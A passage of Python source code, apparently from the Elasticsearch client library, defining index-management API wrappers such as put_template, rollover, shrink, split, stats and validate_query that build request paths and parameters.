:param master_timeout: Specify timeout for connection to master
:param preserve_existing: Whether to update existing settings. If set to `true`
existing settings on an index remain unchanged, the default is `false`
:param timeout: Explicit operation timeout
"""
if settings is None:
raise ValueError("Empty value passed for parameter 'settings'")
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_settings"
else:
__path = "/_settings"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if flat_settings is not None:
__query["flat_settings"] = flat_settings
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if preserve_existing is not None:
__query["preserve_existing"] = preserve_existing
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
__body = settings
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json", "content-type": "application/json"}
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def put_template(
self,
*,
name: Any,
aliases: Optional[Dict[Any, Any]] = None,
create: Optional[bool] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
flat_settings: Optional[bool] = None,
human: Optional[bool] = None,
index_patterns: Optional[Union[List[str], str]] = None,
mappings: Optional[Any] = None,
master_timeout: Optional[Any] = None,
order: Optional[int] = None,
pretty: Optional[bool] = None,
settings: Optional[Dict[str, Any]] = None,
timeout: Optional[Any] = None,
version: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Creates or updates an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: The name of the template
:param aliases: Aliases for the index.
:param create: If true, this request cannot replace or update existing index
templates.
:param flat_settings:
:param index_patterns: Array of wildcard expressions used to match the names
of indices during creation.
:param mappings: Mapping for fields in the index.
:param master_timeout: Period to wait for a connection to the master node. If
no response is received before the timeout expires, the request fails and
returns an error.
:param order: Order in which Elasticsearch applies this template if index matches
multiple templates. Templates with lower 'order' values are merged first.
Templates with higher 'order' values are merged later, overriding templates
with lower values.
:param settings: Configuration options for the index.
:param timeout:
:param version: Version number used to manage index templates externally. This
number is not automatically generated by Elasticsearch.
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_template/{_quote(name)}"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if aliases is not None:
__body["aliases"] = aliases
if create is not None:
__query["create"] = create
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if flat_settings is not None:
__query["flat_settings"] = flat_settings
if human is not None:
__query["human"] = human
if index_patterns is not None:
__body["index_patterns"] = index_patterns
if mappings is not None:
__body["mappings"] = mappings
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if order is not None:
__body["order"] = order
if pretty is not None:
__query["pretty"] = pretty
if settings is not None:
__body["settings"] = settings
if timeout is not None:
__query["timeout"] = timeout
if version is not None:
__body["version"] = version
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json", "content-type": "application/json"}
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def recovery(
self,
*,
index: Optional[Any] = None,
active_only: Optional[bool] = None,
detailed: Optional[bool] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns information about ongoing index shard recoveries.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-recovery.html>`_
:param index: A comma-separated list of index names; use `_all` or empty string
to perform the operation on all indices
:param active_only: Display only those recoveries that are currently on-going
:param detailed: Whether to display detailed information about shard recovery
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_recovery"
else:
__path = "/_recovery"
__query: Dict[str, Any] = {}
if active_only is not None:
__query["active_only"] = active_only
if detailed is not None:
__query["detailed"] = detailed
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def refresh(
self,
*,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Performs the refresh operation in one or more indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-refresh.html>`_
:param index: A comma-separated list of index names; use `_all` or empty string
to perform the operation on all indices
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_refresh"
else:
__path = "/_refresh"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def reload_search_analyzers(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Reloads an index's search analyzers and their resources.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-reload-analyzers.html>`_
:param index: A comma-separated list of index names to reload analyzers for
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}/_reload_search_analyzers"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def resolve_index(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns information about any matching indices, aliases, and data streams
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-resolve-index-api.html>`_
:param name: A comma-separated list of names or wildcard expressions
:param expand_wildcards: Whether wildcard expressions should get expanded to
open or closed indices (default: open)
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_resolve/index/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def rollover(
self,
*,
alias: Any,
new_index: Optional[Any] = None,
aliases: Optional[Dict[Any, Any]] = None,
conditions: Optional[Any] = None,
dry_run: Optional[bool] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
mappings: Optional[Any] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
settings: Optional[Dict[str, Any]] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Updates an alias to point to a new index when the existing index is considered
to be too large or too old.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-rollover-index.html>`_
:param alias: The name of the alias to rollover
:param new_index: The name of the rollover index
:param aliases:
:param conditions:
:param dry_run: If set to true the rollover action will only be validated but
not actually performed even if a condition matches. The default is false
:param mappings:
:param master_timeout: Specify timeout for connection to master
:param settings:
:param timeout: Explicit operation timeout
:param wait_for_active_shards: Set the number of active shards to wait for on
the newly created rollover index before the operation returns.
"""
if alias in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'alias'")
if alias not in SKIP_IN_PATH and new_index not in SKIP_IN_PATH:
__path = f"/{_quote(alias)}/_rollover/{_quote(new_index)}"
elif alias not in SKIP_IN_PATH:
__path = f"/{_quote(alias)}/_rollover"
else:
raise ValueError("Couldn't find a path for the given parameters")
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if aliases is not None:
__body["aliases"] = aliases
if conditions is not None:
__body["conditions"] = conditions
if dry_run is not None:
__query["dry_run"] = dry_run
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if mappings is not None:
__body["mappings"] = mappings
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if settings is not None:
__body["settings"] = settings
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("POST", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def segments(
self,
*,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
pretty: Optional[bool] = None,
verbose: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Provides low-level information about segments in a Lucene index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-segments.html>`_
:param index: A comma-separated list of index names; use `_all` or empty string
to perform the operation on all indices
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param verbose: Includes detailed memory usage by Lucene.
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_segments"
else:
__path = "/_segments"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if pretty is not None:
__query["pretty"] = pretty
if verbose is not None:
__query["verbose"] = verbose
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def shard_stores(
self,
*,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
pretty: Optional[bool] = None,
status: Optional[Union[Any, List[Any]]] = None,
) -> ObjectApiResponse[Any]:
"""
Provides store information for shard copies of indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-shards-stores.html>`_
:param index: List of data streams, indices, and aliases used to limit the request.
:param allow_no_indices: If false, the request returns an error if any wildcard
expression, index alias, or _all value targets only missing or closed indices.
This behavior applies even if the request targets other open indices.
:param expand_wildcards: Type of index that wildcard patterns can match. If the
request can target data streams, this argument determines whether wildcard
expressions match hidden data streams.
:param ignore_unavailable: If true, missing or closed indices are not included
in the response.
:param status: List of shard health statuses used to limit the request.
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_shard_stores"
else:
__path = "/_shard_stores"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if pretty is not None:
__query["pretty"] = pretty
if status is not None:
__query["status"] = status
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def shrink(
self,
*,
index: Any,
target: Any,
aliases: Optional[Dict[Any, Any]] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
settings: Optional[Dict[str, Any]] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Allow to shrink an existing index into a new index with fewer primary shards.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-shrink-index.html>`_
:param index: The name of the source index to shrink
:param target: The name of the target index to shrink into
:param aliases:
:param master_timeout: Specify timeout for connection to master
:param settings:
:param timeout: Explicit operation timeout
:param wait_for_active_shards: Set the number of active shards to wait for on
the shrunken index before the operation returns.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
if target in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'target'")
__path = f"/{_quote(index)}/_shrink/{_quote(target)}"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if aliases is not None:
__body["aliases"] = aliases
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if settings is not None:
__body["settings"] = settings
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
parameter_aliases={"_meta": "meta"},
)
def simulate_index_template(
self,
*,
name: Any,
allow_auto_create: Optional[bool] = None,
composed_of: Optional[List[Any]] = None,
create: Optional[bool] = None,
data_stream: Optional[Any] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
index_patterns: Optional[Any] = None,
master_timeout: Optional[Any] = None,
meta: Optional[Any] = None,
pretty: Optional[bool] = None,
priority: Optional[int] = None,
template: Optional[Any] = None,
version: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Simulate matching the given index name against the index templates in the system
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: Index or template name to simulate
:param allow_auto_create:
:param composed_of:
:param create: If `true`, the template passed in the body is only used if no
existing templates match the same index patterns. If `false`, the simulation
uses the template with the highest priority. Note that the template is not
permanently added or updated in either case; it is only used for the simulation.
:param data_stream:
:param index_patterns:
:param master_timeout: Period to wait for a connection to the master node. If
no response is received before the timeout expires, the request fails and
returns an error.
:param meta:
:param priority:
:param template:
:param version:
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_index_template/_simulate_index/{_quote(name)}"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if allow_auto_create is not None:
__body["allow_auto_create"] = allow_auto_create
if composed_of is not None:
__body["composed_of"] = composed_of
if create is not None:
__query["create"] = create
if data_stream is not None:
__body["data_stream"] = data_stream
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if index_patterns is not None:
__body["index_patterns"] = index_patterns
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if meta is not None:
__body["_meta"] = meta
if pretty is not None:
__query["pretty"] = pretty
if priority is not None:
__body["priority"] = priority
if template is not None:
__body["template"] = template
if version is not None:
__body["version"] = version
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("POST", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_name="template",
)
def simulate_template(
self,
*,
name: Optional[Any] = None,
create: Optional[bool] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
template: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Simulate resolving the given template name or body
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: Name of the index template to simulate. To test a template configuration
before you add it to the cluster, omit this parameter and specify the template
configuration in the request body.
:param create: If true, the template passed in the body is only used if no existing
templates match the same index patterns. If false, the simulation uses the
template with the highest priority. Note that the template is not permanently
added or updated in either case; it is only used for the simulation.
:param master_timeout: Period to wait for a connection to the master node. If
no response is received before the timeout expires, the request fails and
returns an error.
:param template:
"""
if name not in SKIP_IN_PATH:
__path = f"/_index_template/_simulate/{_quote(name)}"
else:
__path = "/_index_template/_simulate"
__query: Dict[str, Any] = {}
if create is not None:
__query["create"] = create
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
__body = template
if not __body:
__body = None
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("POST", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def split(
self,
*,
index: Any,
target: Any,
aliases: Optional[Dict[Any, Any]] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
settings: Optional[Dict[str, Any]] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Allows you to split an existing index into a new index with more primary shards.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-split-index.html>`_
:param index: The name of the source index to split
:param target: The name of the target index to split into
:param aliases:
:param master_timeout: Specify timeout for connection to master
:param settings:
:param timeout: Explicit operation timeout
:param wait_for_active_shards: Set the number of active shards to wait for on
the shrunken index before the operation returns.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
if target in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'target'")
__path = f"/{_quote(index)}/_split/{_quote(target)}"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if aliases is not None:
__body["aliases"] = aliases
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if settings is not None:
__body["settings"] = settings
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def stats(
self,
*,
index: Optional[Any] = None,
metric: Optional[Any] = None,
completion_fields: Optional[Any] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
fielddata_fields: Optional[Any] = None,
fields: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
forbid_closed_indices: Optional[bool] = None,
groups: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
include_segment_file_sizes: Optional[bool] = None,
include_unloaded_segments: Optional[bool] = None,
level: Optional[Any] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Provides statistics on operations happening in an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-stats.html>`_
:param index: A comma-separated list of index names; use `_all` or empty string
to perform the operation on all indices
        :param metric: Limit the information returned to the specific metrics.
:param completion_fields: A comma-separated list of fields for the `completion`
index metric (supports wildcards)
        :param expand_wildcards: Whether to expand wildcard expressions to concrete
            indices that are open, closed, or both.
:param fielddata_fields: A comma-separated list of fields for the `fielddata`
index metric (supports wildcards)
:param fields: A comma-separated list of fields for `fielddata` and `completion`
index metric (supports wildcards)
        :param forbid_closed_indices: If set to false, stats will also be collected
            from closed indices if explicitly specified or if expand_wildcards expands
            to closed indices
:param groups: A comma-separated list of search groups for `search` index metric
:param include_segment_file_sizes: Whether to report the aggregated disk usage
of each one of the Lucene index files (only applies if segment stats are
requested)
        :param include_unloaded_segments: If set to true, segment stats will include
            stats for segments that are not currently loaded into memory
:param level: Return stats aggregated at cluster, index or shard level
"""
if index not in SKIP_IN_PATH and metric not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_stats/{_quote(metric)}"
elif index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_stats"
elif metric not in SKIP_IN_PATH:
__path = f"/_stats/{_quote(metric)}"
else:
__path = "/_stats"
__query: Dict[str, Any] = {}
if completion_fields is not None:
__query["completion_fields"] = completion_fields
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if fielddata_fields is not None:
__query["fielddata_fields"] = fielddata_fields
if fields is not None:
__query["fields"] = fields
if filter_path is not None:
__query["filter_path"] = filter_path
if forbid_closed_indices is not None:
__query["forbid_closed_indices"] = forbid_closed_indices
if groups is not None:
__query["groups"] = groups
if human is not None:
__query["human"] = human
if include_segment_file_sizes is not None:
__query["include_segment_file_sizes"] = include_segment_file_sizes
if include_unloaded_segments is not None:
__query["include_unloaded_segments"] = include_unloaded_segments
if level is not None:
__query["level"] = level
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def unfreeze(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[str] = None,
) -> ObjectApiResponse[Any]:
"""
Unfreezes an index. When a frozen index is unfrozen, the index goes through the
normal recovery process and becomes writeable again.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/unfreeze-index-api.html>`_
:param index: The name of the index to unfreeze
        :param allow_no_indices: Whether to ignore a wildcard indices expression that
            resolves into no concrete indices. (This includes the `_all` string or when
            no indices have been specified.)
        :param expand_wildcards: Whether to expand wildcard expressions to concrete
            indices that are open, closed, or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param master_timeout: Specify timeout for connection to master
:param timeout: Explicit operation timeout
:param wait_for_active_shards: Sets the number of active shards to wait for before
the operation returns.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}/_unfreeze"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def update_aliases(
self,
*,
actions: Optional[List[Any]] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Updates index aliases.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html>`_
        :param actions: The list of alias actions to perform (e.g. `add`, `remove`,
            `remove_index`).
:param master_timeout: Specify timeout for connection to master
:param timeout: Request timeout
"""
__path = "/_aliases"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if actions is not None:
__body["actions"] = actions
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json", "content-type": "application/json"}
return self._perform_request("POST", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def validate_query(
self,
*,
index: Optional[Any] = None,
all_shards: Optional[bool] = None,
allow_no_indices: Optional[bool] = None,
analyze_wildcard: Optional[bool] = None,
analyzer: Optional[str] = None,
default_operator: Optional[Any] = None,
df: Optional[str] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
explain: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
lenient: Optional[bool] = None,
pretty: Optional[bool] = None,
q: Optional[str] = None,
query: Optional[Any] = None,
rewrite: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Allows a user to validate a potentially expensive query without executing it.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/search-validate.html>`_
:param index: A comma-separated list of index names to restrict the operation;
use `_all` or empty string to perform the operation on all indices
:param all_shards: Execute validation on all shards instead of one random shard
per index
        :param allow_no_indices: Whether to ignore a wildcard indices expression that
            resolves into no concrete indices. (This includes the `_all` string or when
            no indices have been specified.)
:param analyze_wildcard: Specify whether wildcard and prefix queries should be
analyzed (default: false)
:param analyzer: The analyzer to use for the query string
:param default_operator: The default operator for query string query (AND or
OR)
:param df: The field to use as default where no field prefix is given in the
query string
        :param expand_wildcards: Whether to expand wildcard expressions to concrete
            indices that are open, closed, or both.
:param explain: Return detailed information about the error
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param lenient: Specify whether format-based query failures (such as providing
text to a numeric field) should be ignored
:param q: Query in the Lucene query string syntax
        :param query: The query definition to validate, specified using the Query DSL.
:param rewrite: Provide a more detailed explanation showing the actual Lucene
query that will be executed.
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_validate/query"
else:
__path = "/_validate/query"
__query: Dict[str, Any] = {}
__body: Dict[str, Any] = {}
